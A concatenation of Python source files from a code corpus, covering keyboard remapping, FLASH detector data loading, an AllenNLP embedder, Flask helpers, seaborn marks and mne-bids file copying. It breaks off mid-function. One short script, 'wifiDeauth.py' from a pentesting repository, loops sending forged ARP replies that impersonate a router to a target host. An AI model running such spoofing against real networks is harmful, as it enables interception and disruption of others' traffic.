        except (UnicodeDecodeError, ValueError):
self._logger.exception(
f'{device.device_path} has malformed ID_INPUT_KEYBOARD property')
return False
try:
if device.properties.asbool('ID_INPUT_MOUSE'):
return False
except KeyError:
pass
        except (UnicodeDecodeError, ValueError):
self._logger.exception(
f'{device.device_path} has malformed ID_INPUT_MOUSE property')
return False
return True
def _remove_device(self, device):
task = self._devices.pop(device.device_path, None)
if task is not None:
task.cancel()
async def _timeout(timeout, interrupted):
try:
await asyncio.sleep(timeout)
interrupted.set()
except asyncio.CancelledError:
pass
async def main(timeout):
interrupted = asyncio.Event()
loop = asyncio.get_running_loop()
loop.add_signal_handler(signal.SIGINT, interrupted.set)
if timeout:
timeout_task = asyncio.create_task(_timeout(timeout, interrupted))
else:
timeout_task = None
keyboard_remapper = KeyboardRemapper(interrupted)
try:
await keyboard_remapper.start()
await interrupted.wait()
finally:
loop.remove_signal_handler(signal.SIGINT)
if timeout_task:
timeout_task.cancel()
await timeout_task
await keyboard_remapper.stop()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Remap keyboard input.')
parser.add_argument('-v', '--verbose', action='store_true',
help='verbose output')
parser.add_argument('-d', '--debug', action='store_true',
help='enable debugging')
parser.add_argument('-t', '--timeout', metavar='SECONDS', type=int,
help='exit after timeout instead of running indefinitely')
args = parser.parse_args()
timeout = args.timeout
if args.debug:
if timeout is None:
timeout = 1
log_level = logging.DEBUG
elif args.verbose:
log_level = logging.INFO
else:
log_level = logging.WARN
logging.basicConfig(level=log_level)
asyncio.run(main(timeout))
|
StarcoderdataPython
|
1781890
|
<reponame>sjhonatan/pentesting<filename>wifiDeauth.py
#!/usr/bin/python
#for python 2.7
from subprocess import check_output,call
import time
try:
from scapy.all import *
except ImportError:
    print "Installation of scapy is necessary"
    raise SystemExit(1)
print "Ip address of target"
ipTarget = ...
print "Ip address of router"
router = ...
print "Mac address of target"
macTarget = ...
packet = ARP()
packet.psrc = router
packet.pdst = ipTarget
while 1:
send(packet,verbose=0)
time.sleep(1)
|
StarcoderdataPython
|
57520
|
<reponame>momentoscope/hextofloader
"""
This module implements the flash data preprocessing class.
The raw hdf5 data is saved into parquet files and loaded as a pandas dataframe.
The class attributes are inherited by dataframeReader - a wrapper class.
"""
import os
from typing import cast
from pathlib import Path
from functools import reduce
from multiprocessing import Pool, cpu_count
from itertools import compress
import numpy as np
from pandas import Series, DataFrame, MultiIndex
import dask.dataframe as dd
import h5py
from hextofloader.config_parser import configParser
class FlashLoader(configParser):
"""
The class generates multiindexed multidimensional pandas dataframes
from the new FLASH dataformat resolved by both macro and microbunches
alongside electrons.
"""
def __init__(self, runNumber, config) -> None:
super().__init__(config)
        # Set all channels, excluding pulseId as default
self.channels = self.availableChannels
self.runNumber = runNumber
self.index_per_electron = None
self.index_per_pulse = None
self.prq_names = []
self.failed_strings = []
self.dataframes = []
@property
def availableChannels(self) -> list:
"""Returns the channel names that are available for use,
excluding pulseId, defined by the json file"""
available_channels = list(self.all_channels.keys())
available_channels.remove("pulseId")
return available_channels
@property
def channelsPerPulse(self) -> list:
"""Returns a list of channels with per_pulse format,
        including all auxiliary channels"""
channels_per_pulse = []
for key in self.availableChannels:
if self.all_channels[key]["format"] == "per_pulse":
if key == "dldAux":
for aux_key in self.all_channels[key]["dldAuxChannels"].keys():
channels_per_pulse.append(aux_key)
else:
channels_per_pulse.append(key)
return channels_per_pulse
@property
def channelsPerElectron(self) -> list:
"""Returns a list of channels with per_electron format"""
return [
key
for key in self.availableChannels
if self.all_channels[key]["format"] == "per_electron"
]
@property
def channelsPerTrain(self) -> list:
"""Returns a list of channels with per_train format"""
return [
key
for key in self.availableChannels
if self.all_channels[key]["format"] == "per_train"
]
def resetMultiIndex(self) -> None:
"""Resets the index per pulse and electron"""
self.index_per_electron = None
self.index_per_pulse = None
def createMultiIndexPerElectron(self, h5_file: h5py.File) -> None:
"""Creates an index per electron using pulseId
for usage with the electron resolved pandas dataframe"""
# Macrobunch IDs obtained from the pulseId channel
[train_id, np_array] = self.createNumpyArrayPerChannel(h5_file, "pulseId")
# Create a series with the macrobunches as index and
# microbunches as values
macrobunches = (
Series(
(np_array[i] for i in train_id.index), name="pulseId", index=train_id
) - self.UBID_OFFSET
)
        # Explode dataframe to get all microbunch values per macrobunch,
# remove NaN values and convert to type int
microbunches = macrobunches.explode().dropna().astype(int)
# Create temporary index values
index_temp = MultiIndex.from_arrays(
(microbunches.index, microbunches.values), names=["trainId", "pulseId"]
)
# Calculate the electron counts per pulseId
# unique preserves the order of appearance
electron_counts = index_temp.value_counts()[index_temp.unique()].values
# Series object for indexing with electrons
electrons = Series(
[np.arange(electron_counts[i]) for i in range(electron_counts.size)]
).explode()
# Create a pandas multiindex using the exploded datasets
self.index_per_electron = MultiIndex.from_arrays(
(microbunches.index, microbunches.values, electrons),
names=["trainId", "pulseId", "electronId"],
)
def createMultiIndexPerPulse(self, train_id, np_array) -> None:
"""Creates an index per pulse using a pulse resovled channel's
macrobunch ID, for usage with the pulse resolved pandas dataframe"""
# Create a pandas multiindex, useful to compare electron and
# pulse resolved dataframes
self.index_per_pulse = MultiIndex.from_product(
(train_id, np.arange(0, np_array.shape[1])), names=["trainId", "pulseId"]
)
def createNumpyArrayPerChannel(
self, h5_file: h5py.File, channel: str
) -> tuple[Series, np.ndarray]:
"""Returns a numpy Array for a given channel name for a given file"""
# Get the data from the necessary h5 file and channel
group = cast(h5py.Group, h5_file[self.all_channels[channel]["group_name"]])
channel_dict = self.all_channels[channel] # channel parameters
train_id = Series(group["index"], name="trainId") # macrobunch
# unpacks the timeStamp or value
if channel == "timeStamp":
np_array = cast(h5py.Dataset, group["time"])[()]
else:
np_array = cast(h5py.Dataset, group["value"])[()]
np_array = cast(np.ndarray, np_array)
# Uses predefined axis and slice from the json file
# to choose correct dimension for necessary channel
if "axis" in channel_dict:
np_array = np.take(
np_array, channel_dict["slice"], axis=channel_dict["axis"]
)
return train_id, np_array
def createDataframePerChannel(
self, h5_file: h5py.File, channel: str
) -> Series | DataFrame:
"""Returns a pandas DataFrame for a given channel name for
a given file. The Dataframe contains the MultiIndex and returns
depending on the channel's format"""
[train_id, np_array] = self.createNumpyArrayPerChannel(
h5_file, channel
) # numpy Array created
channel_dict = self.all_channels[channel] # channel parameters
# If np_array is size zero, fill with NaNs
if np_array.size == 0:
np_array = np.full_like(train_id, np.nan, dtype=np.double)
return Series(
(np_array[i] for i in train_id.index), name=channel, index=train_id
)
# Electron resolved data is treated here
if channel_dict["format"] == "per_electron":
# Creates the index_per_electron if it does not
# exist for a given file
if self.index_per_electron is None:
self.createMultiIndexPerElectron(h5_file)
# The microbunch resolved data is exploded and
            # converted to dataframe, after which the MultiIndex is set
# The NaN values are dropped, alongside the
# pulseId = 0 (meaningless)
return (
Series((np_array[i] for i in train_id.index), name=channel)
.explode()
.dropna()
.to_frame()
.set_index(self.index_per_electron)
.drop(
index=cast(list[int], np.arange(-self.UBID_OFFSET, 0)),
level=1,
errors="ignore",
)
)
# Pulse resolved data is treated here
elif channel_dict["format"] == "per_pulse":
            # Special case for auxiliary channels which checks the channel
# dictionary for correct slices and creates a multicolumn
# pandas dataframe
if channel == "dldAux":
# The macrobunch resolved data is repeated 499 times to be
                # compared to electron resolved data for each auxiliary channel
# and converted to a multicolumn dataframe
data_frames = (
Series(
(np_array[i, value] for i in train_id.index),
name=key,
index=train_id,
).to_frame()
for key, value in channel_dict["dldAuxChannels"].items()
)
# Multiindex set and combined dataframe returned
return reduce(DataFrame.combine_first, data_frames)
else:
# For all other pulse resolved channels, macrobunch resolved
# data is exploded to a dataframe and the MultiIndex set
# Creates the index_per_pulse for the given channel
self.createMultiIndexPerPulse(train_id, np_array)
return (
Series((np_array[i] for i in train_id.index), name=channel)
.explode()
.to_frame()
.set_index(self.index_per_pulse)
)
elif channel_dict["format"] == "per_train":
return (
Series((np_array[i] for i in train_id.index), name=channel)
.to_frame()
.set_index(train_id)
)
else:
raise ValueError(
channel
+ "has an undefined format. Available formats are \
per_pulse, per_electron and per_train"
)
def concatenateChannels(
        self, h5_file: h5py.File, format_: str | None = None
) -> Series | DataFrame:
"""Returns a concatenated pandas DataFrame for either all pulse,
train or electron resolved channels."""
# filters for valid channels
valid_names = [
each_name for each_name in self.channels if each_name in self.all_channels
]
# Only channels with the defined format are selected and stored
# in an iterable list
if format_ is not None:
channels = [
each_name
for each_name in valid_names
if self.all_channels[each_name]["format"] == format_
]
else:
channels = [each_name for each_name in valid_names]
        # if the defined format has channels, returns a concatenated Dataframe.
# Otherwise returns empty Dataframe.
if channels:
data_frames = (
self.createDataframePerChannel(h5_file, each) for each in channels
)
return reduce(
lambda left, right: left.join(right, how="outer"), data_frames
)
else:
return DataFrame()
def createDataframePerFile(self, file_path: Path) -> Series | DataFrame:
"""Returns two pandas DataFrames constructed for the given file.
        The DataFrames contain the datasets from the iterable in the
order opposite to specified by channel names. One DataFrame is
pulse resolved and the other electron resolved.
"""
# Loads h5 file and creates two dataframes
with h5py.File(file_path, "r") as h5_file:
self.resetMultiIndex() # Reset MultiIndexes for next file
return self.concatenateChannels(h5_file)
def runFilesNames(
self, run_number: int, daq: str, raw_data_dir: Path
) -> list[Path]:
"""Returns all filenames of given run located in directory
for the given daq."""
stream_name_prefixes = {
"pbd": "GMD_DATA_gmd_data",
"pbd2": "FL2PhotDiag_pbd2_gmd_data",
"fl1user1": "FLASH1_USER1_stream_2",
"fl1user2": "FLASH1_USER2_stream_2",
"fl1user3": "FLASH1_USER3_stream_2",
"fl2user1": "FLASH2_USER1_stream_2",
"fl2user2": "FLASH2_USER2_stream_2",
}
return sorted(
Path(raw_data_dir).glob(
f"{stream_name_prefixes[daq]}_run{run_number}_*.h5"
),
key=lambda filename: str(filename).split("_")[-1],
)
def h5ToParquet(self, h5_path: Path, prq_path: str) -> None:
"""Uses the createDataFramePerFile method and saves
the dataframes to a parquet file."""
try:
(
self.createDataframePerFile(h5_path)
.reset_index(level=["trainId", "pulseId", "electronId"])
.to_parquet(prq_path, index=False)
)
except ValueError as failed_string_error:
self.failed_strings.append(f"{prq_path}: {failed_string_error}")
self.prq_names.remove(prq_path)
def fillNA(self) -> None:
"""Routine to fill the NaN values with intrafile forward filling."""
# First use forward filling method to fill each file's
# pulse and train resolved channels.
channels = self.channelsPerPulse + self.channelsPerTrain
for i in range(len(self.dataframes)):
self.dataframes[i][channels] = self.dataframes[i][channels].fillna(
method="ffill"
)
        # This loop forward fills between the consecutive files.
# The first run file will have NaNs, unless another run
# before it has been defined.
for i in range(1, len(self.dataframes)):
# Take only pulse channels
subset = self.dataframes[i][channels]
# Find which column(s) contain NaNs.
is_null = subset.loc[0].isnull().values.compute()
# Statement executed if there is more than one NaN value in the
# first row from all columns
if is_null.sum() > 0:
# Select channel names with only NaNs
channels_to_overwrite = list(compress(channels, is_null[0]))
# Get the values for those channels from previous file
values = self.dataframes[i - 1][channels].tail(1).values[0]
# Fill all NaNs by those values
subset[channels_to_overwrite] = subset[channels_to_overwrite].fillna(
dict(zip(channels_to_overwrite, values))
)
# Overwrite the dataframes with filled dataframes
self.dataframes[i][channels] = subset
def readData(
self, runs: list[int] | int = 0, ignore_missing_runs: bool = False
) -> None:
"""Read express data from DAQ, generating a parquet in between."""
if not runs:
runs = self.runNumber
# create a per_file directory
temp_parquet_dir = self.DATA_PARQUET_DIR.joinpath("per_file")
if not temp_parquet_dir.exists():
os.mkdir(temp_parquet_dir)
# Prepare a list of names for the files to read and parquets to write
try:
runs = cast(list, runs)
runs_str = f"Runs {runs[0]} to {runs[-1]}"
except TypeError:
runs = cast(int, runs)
runs_str = f"Run {runs}"
runs = [runs]
parquet_name = f"{temp_parquet_dir}/"
all_files = []
for run in runs:
files = self.runFilesNames(cast(int, run), self.DAQ, self.DATA_RAW_DIR)
for file in files:
all_files.append(file)
if len(files) == 0 and not ignore_missing_runs:
raise FileNotFoundError(f"No file found for run {run}")
self.prq_names = [
parquet_name + all_files[i].stem for i in range(len(all_files))
]
missing_files = []
missing_prq_names = []
# only read and write files which were not read already
for i in range(len(self.prq_names)):
if not Path(self.prq_names[i]).exists():
missing_files.append(all_files[i])
missing_prq_names.append(self.prq_names[i])
print(
(f"Reading {runs_str}: {len(missing_files)} new files of "
f"{len(all_files)} total.")
)
self.failed_strings = []
self.resetMultiIndex() # initializes the indices for h5ToParquet
# Set cores for multiprocessing
N_CORES = len(missing_files)
if N_CORES > cpu_count() - 1:
N_CORES = cpu_count() - 1
# Read missing files using multiple cores
if len(missing_files) > 0:
with Pool(processes=N_CORES) as pool:
pool.starmap(
self.h5ToParquet, tuple(zip(missing_files, missing_prq_names))
)
if len(self.failed_strings) > 0:
print(
(f"Failed reading {len(self.failed_strings)}"
f"files of{len(all_files)}:")
)
for failed_string in self.failed_strings:
print(f"\t- {failed_string}")
if len(self.prq_names) == 0:
raise ValueError(
"No data available. Probably failed reading all h5 files"
)
print(
(f"Loading {len(self.prq_names)} dataframes. Failed reading "
f"{len(all_files)-len(self.prq_names)} files.")
)
self.dataframes = [dd.read_parquet(fn) for fn in self.prq_names]
self.fillNA()
dataframe = cast(dd.DataFrame, dd.concat(self.dataframes))
df_electron = dataframe.dropna(subset=self.channelsPerElectron)
pulse_columns = (
["trainId", "pulseId", "electronId"]
+ self.channelsPerPulse
+ self.channelsPerTrain
)
df_pulse = dataframe[pulse_columns]
df_pulse = df_pulse[
(df_pulse["electronId"] == 0) | (np.isnan(df_pulse["electronId"]))
]
self.dd = df_electron.repartition(npartitions=len(self.prq_names))
|
StarcoderdataPython
|
4903951
|
import codecs
from collections import defaultdict
import torch
from allennlp.common import Params
from allennlp.data import Vocabulary
from allennlp.modules.token_embedders.token_embedder import TokenEmbedder
@TokenEmbedder.register("sentence_embedding")
class SentenceEmbedding(TokenEmbedder):
"""
    Embedder for contextual embeddings, which reads a file of the format 'sentence TAB index TAB vector'.
"""
def read_file(self, path):
self.embs = defaultdict(lambda: defaultdict())
with codecs.open(path, encoding='utf-8') as f:
for line in f:
# Read sentence, index and word vector
sp = line.split("\t")
vector_str = sp[2]
vector = []
for n in vector_str.split(" "):
try:
vector.append(float(n))
except ValueError:
break
index = int(sp[1])
sentence = sp[0]
# Save vector in a dict
self.embs[sentence][index] = vector
def get_output_dim(self) -> int:
return self.output_dim
def forward(self, # pylint: disable=arguments-differ
inputs: torch.Tensor,
word_inputs: torch.Tensor = None) -> torch.Tensor:
"""
:param inputs: list of sentences (sentence = list of token indices)
:param word_inputs: not used
:return: tensor which contains a list of embedded sentences (every sentence is a list of word vectors)
"""
if self.output_dim is None or self.output_dim == 0:
raise NotImplementedError
# Get tokens from token indices
max_sentences_length = len(inputs[0].tolist())
sentences = []
for i in inputs:
token_list = []
for j in i:
if j.item() != 0:
token = self.vocab.get_token_from_index(j.item())
token_list += [token]
sentences += [token_list]
sentence_emb = []
# Read the embeddings from the dict
for sentence_list in sentences:
sentence = " ".join(sentence_list[0:-1])
index = int(sentence_list[-1])
try:
word_embedding = self.embs[sentence][index]
except KeyError:
print("KEY ERROR " + sentence + " INDEX " + str(index))
word_embedding = [0] * self.output_dim
vector_list = []
# Add zeros to the returning tensor for all tokens without vectors. AllenNLP wants an embedding for every token
if index != 0:
for i in range(0, index):
vector_list += [[0] * self.output_dim]
vector_list += [word_embedding]
for i in range(0, max_sentences_length - index - 1):
vector_list += [[0] * self.output_dim]
sentence_emb += [vector_list]
# Create tensor
device = inputs.device
# print(sentence_emb)
tensor = torch.tensor(sentence_emb, device=device)
return tensor
@classmethod
def from_params(cls, vocab: Vocabulary, params: Params) -> 'SentenceEmbedding':
cls.vocab = vocab
embedding_dim = params["embedding_dim"]
pretrained_file = params["pretrained_vector_file"]
return cls(pretrained_file, embedding_dim)
def __init__(self, file, vector_size) -> None:
super().__init__()
self.embs = {}
self.output_dim = vector_size
self.read_file(file)
|
StarcoderdataPython
|
214253
|
<gh_stars>0
import re
from datetime import datetime
from flask import abort, current_app
from flask_login import current_user
from dmapiclient import APIError
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
def get_drafts(apiclient, framework_slug):
try:
drafts = apiclient.find_draft_services(
current_user.supplier_code,
framework=framework_slug
)['services']
except APIError as e:
abort(e.status_code)
complete_drafts = [draft for draft in drafts if draft['status'] == 'submitted']
drafts = [draft for draft in drafts if draft['status'] == 'not-submitted']
return drafts, complete_drafts
def get_lot_drafts(apiclient, framework_slug, lot_slug):
drafts, complete_drafts = get_drafts(apiclient, framework_slug)
return (
[draft for draft in drafts if draft['lotSlug'] == lot_slug],
[draft for draft in complete_drafts if draft['lotSlug'] == lot_slug]
)
def count_unanswered_questions(service_attributes):
unanswered_required, unanswered_optional = (0, 0)
for section in service_attributes:
for question in section.questions:
if question.answer_required:
unanswered_required += 1
elif question.value in ['', [], None]:
unanswered_optional += 1
return unanswered_required, unanswered_optional
def is_service_associated_with_supplier(service):
return service.get('supplierCode') == current_user.supplier_code
def get_signed_document_url(uploader, document_path):
url = uploader.get_signed_url(document_path)
if url is not None:
url = urlparse.urlparse(url)
base_url = urlparse.urlparse(current_app.config['DM_ASSETS_URL'])
return url._replace(netloc=base_url.netloc, scheme=base_url.scheme).geturl()
def parse_document_upload_time(data):
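    # File names are expected to end with a timestamp such as
    # "...-2017-01-31-1455.pdf"; extract it and parse it into a datetime.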
match = re.search(r"(\d{4}-\d{2}-\d{2}-\d{2}\d{2})\..{2,3}$", data)
if match:
return datetime.strptime(match.group(1), "%Y-%m-%d-%H%M")
def get_next_section_name(content, current_section_id):
if content.get_next_editable_section_id(current_section_id):
return content.get_section(
content.get_next_editable_section_id(current_section_id)
).name
|
StarcoderdataPython
|
1857354
|
from __future__ import annotations
from dataclasses import dataclass
import numpy as np
import matplotlib as mpl
from seaborn._marks.base import (
Mark,
Mappable,
MappableBool,
MappableFloat,
MappableString,
MappableColor,
MappableStyle,
resolve_properties,
resolve_color,
)
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import Any
from matplotlib.artist import Artist
from seaborn._core.scales import Scale
@dataclass
class Scatter(Mark):
"""
A point mark defined by strokes with optional fills.
"""
# TODO retype marker as MappableMarker
marker: MappableString = Mappable(rc="scatter.marker", grouping=False)
stroke: MappableFloat = Mappable(.75, grouping=False) # TODO rcParam?
pointsize: MappableFloat = Mappable(3, grouping=False) # TODO rcParam?
color: MappableColor = Mappable("C0", grouping=False)
alpha: MappableFloat = Mappable(1, grouping=False) # TODO auto alpha?
fill: MappableBool = Mappable(True, grouping=False)
fillcolor: MappableColor = Mappable(depend="color", grouping=False)
fillalpha: MappableFloat = Mappable(.2, grouping=False)
def _resolve_paths(self, data):
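        # Resolve marker specs to transformed Paths, caching per marker style so
        # a column of repeated markers does not rebuild the same path each time.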
paths = []
path_cache = {}
marker = data["marker"]
def get_transformed_path(m):
return m.get_path().transformed(m.get_transform())
if isinstance(marker, mpl.markers.MarkerStyle):
return get_transformed_path(marker)
for m in marker:
if m not in path_cache:
path_cache[m] = get_transformed_path(m)
paths.append(path_cache[m])
return paths
def _resolve_properties(self, data, scales):
resolved = resolve_properties(self, data, scales)
resolved["path"] = self._resolve_paths(resolved)
if isinstance(data, dict): # TODO need a better way to check
filled_marker = resolved["marker"].is_filled()
else:
filled_marker = [m.is_filled() for m in resolved["marker"]]
resolved["linewidth"] = resolved["stroke"]
resolved["fill"] = resolved["fill"] & filled_marker
resolved["size"] = resolved["pointsize"] ** 2
resolved["edgecolor"] = resolve_color(self, data, "", scales)
resolved["facecolor"] = resolve_color(self, data, "fill", scales)
# Because only Dot, and not Scatter, has an edgestyle
resolved.setdefault("edgestyle", (0, None))
fc = resolved["facecolor"]
if isinstance(fc, tuple):
resolved["facecolor"] = fc[0], fc[1], fc[2], fc[3] * resolved["fill"]
else:
fc[:, 3] = fc[:, 3] * resolved["fill"] # TODO Is inplace mod a problem?
resolved["facecolor"] = fc
return resolved
def _plot(self, split_gen, scales, orient):
# TODO Not backcompat with allowed (but nonfunctional) univariate plots
# (That should be solved upstream by defaulting to "" for unset x/y?)
# (Be mindful of xmin/xmax, etc!)
# TODO pass scales *into* split_gen?
for keys, data, ax in split_gen():
offsets = np.column_stack([data["x"], data["y"]])
data = self._resolve_properties(data, scales)
points = mpl.collections.PathCollection(
offsets=offsets,
paths=data["path"],
sizes=data["size"],
facecolors=data["facecolor"],
edgecolors=data["edgecolor"],
linewidths=data["linewidth"],
linestyles=data["edgestyle"],
transOffset=ax.transData,
transform=mpl.transforms.IdentityTransform(),
)
ax.add_collection(points)
def _legend_artist(
self, variables: list[str], value: Any, scales: dict[str, Scale],
) -> Artist:
key = {v: value for v in variables}
res = self._resolve_properties(key, scales)
return mpl.collections.PathCollection(
paths=[res["path"]],
sizes=[res["size"]],
facecolors=[res["facecolor"]],
edgecolors=[res["edgecolor"]],
linewidths=[res["linewidth"]],
linestyles=[res["edgestyle"]],
transform=mpl.transforms.IdentityTransform(),
)
# TODO change this to depend on ScatterBase?
@dataclass
class Dot(Scatter):
"""
A point mark defined by shape with optional edges.
"""
marker: MappableString = Mappable("o", grouping=False)
color: MappableColor = Mappable("C0", grouping=False)
alpha: MappableFloat = Mappable(1, grouping=False)
fill: MappableBool = Mappable(True, grouping=False)
edgecolor: MappableColor = Mappable(depend="color", grouping=False)
edgealpha: MappableFloat = Mappable(depend="alpha", grouping=False)
pointsize: MappableFloat = Mappable(6, grouping=False) # TODO rcParam?
edgewidth: MappableFloat = Mappable(.5, grouping=False) # TODO rcParam?
edgestyle: MappableStyle = Mappable("-", grouping=False)
def _resolve_properties(self, data, scales):
# TODO this is maybe a little hacky, is there a better abstraction?
resolved = super()._resolve_properties(data, scales)
filled = resolved["fill"]
main_stroke = resolved["stroke"]
edge_stroke = resolved["edgewidth"]
resolved["linewidth"] = np.where(filled, edge_stroke, main_stroke)
# Overwrite the colors that the super class set
main_color = resolve_color(self, data, "", scales)
edge_color = resolve_color(self, data, "edge", scales)
if not np.isscalar(filled):
# Expand dims to use in np.where with rgba arrays
filled = filled[:, None]
resolved["edgecolor"] = np.where(filled, edge_color, main_color)
filled = np.squeeze(filled)
if isinstance(main_color, tuple):
main_color = tuple([*main_color[:3], main_color[3] * filled])
else:
main_color = np.c_[main_color[:, :3], main_color[:, 3] * filled]
resolved["facecolor"] = main_color
return resolved
|
StarcoderdataPython
|
3388311
|
<filename>imperfecto/misc/utils.py
"""
A collection of helper functions and classes.
"""
from enum import Enum
import os
import numpy as np
def run_web(config: dict) -> None:
"""Run the express server.
Args:
config: a dictionary containing the configuration for the express server
"""
command = "node web/server/server.js"
for key, value in config.items():
command += f" --{key}={value}"
print(f">> Running $ {command}")
os.system(command)
class lessVerboseEnum(Enum):
"""
A less verbose version of the Enum class.
Example::
class Test(lessVerboseEnum):
TEST=0
print(Test.TEST) # prints "TEST" instead of "Test.TEST"
"""
def __repr__(self):
return self.name
def __str__(self):
return self.name
def get_action(action_probs: np.ndarray) -> int:
"""
Sample an action from an action probability distribution.
Args:
action_probs: a numpy array of probabilities of length n_actions
Returns:
the index of the action sampled with the given probabilities
"""
action = np.random.choice(np.arange(len(action_probs)), p=action_probs)
return action
|
StarcoderdataPython
|
277141
|
<reponame>SophieHerbst/mne-bids
"""Utility functions to copy raw data files.
When writing BIDS datasets, we often move and/or rename raw data files. Several
original data formats have properties that restrict such operations. That is,
moving/renaming raw data files naively might lead to broken files, for example
due to internal pointers that are not being updated.
"""
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
import os
import os.path as op
import re
import shutil as sh
from scipy.io import loadmat, savemat
from mne_bids.read import _parse_ext
def _copytree(src, dst, **kwargs):
"""See: https://github.com/jupyterlab/jupyterlab/pull/5150."""
try:
sh.copytree(src, dst, **kwargs)
except sh.Error as error:
# `copytree` throws an error if copying to + from NFS even though
# the copy is successful (see https://bugs.python.org/issue24564)
if '[Errno 22]' not in str(error) or not op.exists(dst):
raise
def _get_brainvision_encoding(vhdr_file, verbose=False):
"""Get the encoding of .vhdr and .vmrk files.
Parameters
----------
vhdr_file : str
path to the header file
verbose : Bool
determine whether results should be logged.
(default False)
Returns
-------
enc : str
encoding of the .vhdr file to pass it on to open() function
either 'UTF-8' (default) or whatever encoding scheme is specified
in the header
"""
with open(vhdr_file, 'rb') as ef:
enc = ef.read()
if enc.find(b'Codepage=') != -1:
enc = enc[enc.find(b'Codepage=') + 9:]
enc = enc.split()[0]
enc = enc.decode()
src = '(read from header)'
else:
enc = 'UTF-8'
src = '(default)'
if verbose is True:
print('Detected file encoding: %s %s.' % (enc, src))
return enc
def _get_brainvision_paths(vhdr_path):
"""Get the .eeg and .vmrk file paths from a BrainVision header file.
Parameters
----------
vhdr_path : str
path to the header file
Returns
-------
paths : tuple
paths to the .eeg file at index 0 and the .vmrk file
at index 1 of the returned tuple
"""
fname, ext = _parse_ext(vhdr_path)
if ext != '.vhdr':
raise ValueError('Expecting file ending in ".vhdr",'
' but got {}'.format(ext))
# Header file seems fine
# extract encoding from brainvision header file, or default to utf-8
enc = _get_brainvision_encoding(vhdr_path)
# ..and read it
with open(vhdr_path, 'r', encoding=enc) as f:
lines = f.readlines()
# Try to find data file .eeg
eeg_file_match = re.search(r'DataFile=(.*\.eeg)', ' '.join(lines))
if not eeg_file_match:
raise ValueError('Could not find a .eeg file link in'
' {}'.format(vhdr_path))
else:
eeg_file = eeg_file_match.groups()[0]
# Try to find marker file .vmrk
vmrk_file_match = re.search(r'MarkerFile=(.*\.vmrk)', ' '.join(lines))
if not vmrk_file_match:
raise ValueError('Could not find a .vmrk file link in'
' {}'.format(vhdr_path))
else:
vmrk_file = vmrk_file_match.groups()[0]
# Make sure we are dealing with file names as is customary, not paths
# Paths are problematic when copying the files to another system. Instead,
# always use the file name and keep the file triplet in the same directory
assert os.sep not in eeg_file
assert os.sep not in vmrk_file
# Assert the paths exist
head, tail = op.split(vhdr_path)
eeg_file_path = op.join(head, eeg_file)
vmrk_file_path = op.join(head, vmrk_file)
assert op.exists(eeg_file_path)
assert op.exists(vmrk_file_path)
# Return the paths
return (eeg_file_path, vmrk_file_path)
def copyfile_ctf(src, dest):
"""Copy and rename CTF files to a new location.
Parameters
----------
src : str
path to the source raw .ds folder
dest : str
path to the destination of the new bids folder.
"""
_copytree(src, dest)
# list of file types to rename
file_types = ('.acq', '.eeg', '.hc', '.hist', '.infods', '.bak',
'.meg4', '.newds', '.res4')
# Rename files in dest with the name of the dest directory
fnames = [f for f in os.listdir(dest) if f.endswith(file_types)]
bids_folder_name = op.splitext(op.split(dest)[-1])[0]
for fname in fnames:
ext = op.splitext(fname)[-1]
os.rename(op.join(dest, fname),
op.join(dest, bids_folder_name + ext))
def copyfile_brainvision(vhdr_src, vhdr_dest, verbose=False):
"""Copy a BrainVision file triplet to a new location and repair links.
Parameters
----------
vhdr_src, vhdr_dest: str
The src path of the .vhdr file to be copied and the destination
path. The .eeg and .vmrk files associated with the .vhdr file
will be given names as in vhdr_dest with adjusted extensions.
Internal file pointers will be fixed.
"""
    # Get extension of the brainvision file
fname_src, ext_src = _parse_ext(vhdr_src)
fname_dest, ext_dest = _parse_ext(vhdr_dest)
if ext_src != ext_dest:
raise ValueError('Need to move data with same extension'
' but got "{}", "{}"'.format(ext_src, ext_dest))
eeg_file_path, vmrk_file_path = _get_brainvision_paths(vhdr_src)
# extract encoding from brainvision header file, or default to utf-8
enc = _get_brainvision_encoding(vhdr_src, verbose)
# Copy data .eeg ... no links to repair
sh.copyfile(eeg_file_path, fname_dest + '.eeg')
# Write new header and marker files, fixing the file pointer links
# For that, we need to replace an old "basename" with a new one
# assuming that all .eeg, .vhdr, .vmrk share one basename
__, basename_src = op.split(fname_src)
assert basename_src + '.eeg' == op.split(eeg_file_path)[-1]
assert basename_src + '.vmrk' == op.split(vmrk_file_path)[-1]
__, basename_dest = op.split(fname_dest)
search_lines = ['DataFile=' + basename_src + '.eeg',
'MarkerFile=' + basename_src + '.vmrk']
with open(vhdr_src, 'r', encoding=enc) as fin:
with open(vhdr_dest, 'w', encoding=enc) as fout:
for line in fin.readlines():
if line.strip() in search_lines:
line = line.replace(basename_src, basename_dest)
fout.write(line)
with open(vmrk_file_path, 'r', encoding=enc) as fin:
with open(fname_dest + '.vmrk', 'w', encoding=enc) as fout:
for line in fin.readlines():
if line.strip() in search_lines:
line = line.replace(basename_src, basename_dest)
fout.write(line)
if verbose:
for ext in ['.eeg', '.vhdr', '.vmrk']:
print('Created "{}" in "{}"'
.format(fname_dest + ext,
op.dirname(op.realpath(vhdr_dest))))
def copyfile_eeglab(src, dest):
"""Copy a EEGLAB files to a new location and adjust pointer to '.fdt' file.
Some EEGLAB .set files come with a .fdt binary file that contains the data.
When moving a .set file, we need to check for an associated .fdt file and
move it to an appropriate location as well as update an internal pointer
within the .set file.
Notes
-----
Work in progress. This function will abort upon the encounter of a .fdt
file.
"""
    # Get extension of the EEGLAB file
fname_src, ext_src = _parse_ext(src)
fname_dest, ext_dest = _parse_ext(dest)
if ext_src != ext_dest:
raise ValueError('Need to move data with same extension'
' but got {}, {}'.format(ext_src, ext_dest))
# Extract matlab struct "EEG" from EEGLAB file
mat = loadmat(src, squeeze_me=False, chars_as_strings=False,
mat_dtype=False, struct_as_record=True)
if 'EEG' not in mat:
raise ValueError('Could not find "EEG" field in {}'.format(src))
eeg = mat['EEG']
# If the data field is a string, it points to a .fdt file in src dir
data = eeg[0][0]['data']
if all([item in data[0, -4:] for item in '.fdt']):
head, tail = op.split(src)
fdt_pointer = ''.join(data.tolist()[0])
fdt_path = op.join(head, fdt_pointer)
fdt_name, fdt_ext = _parse_ext(fdt_path)
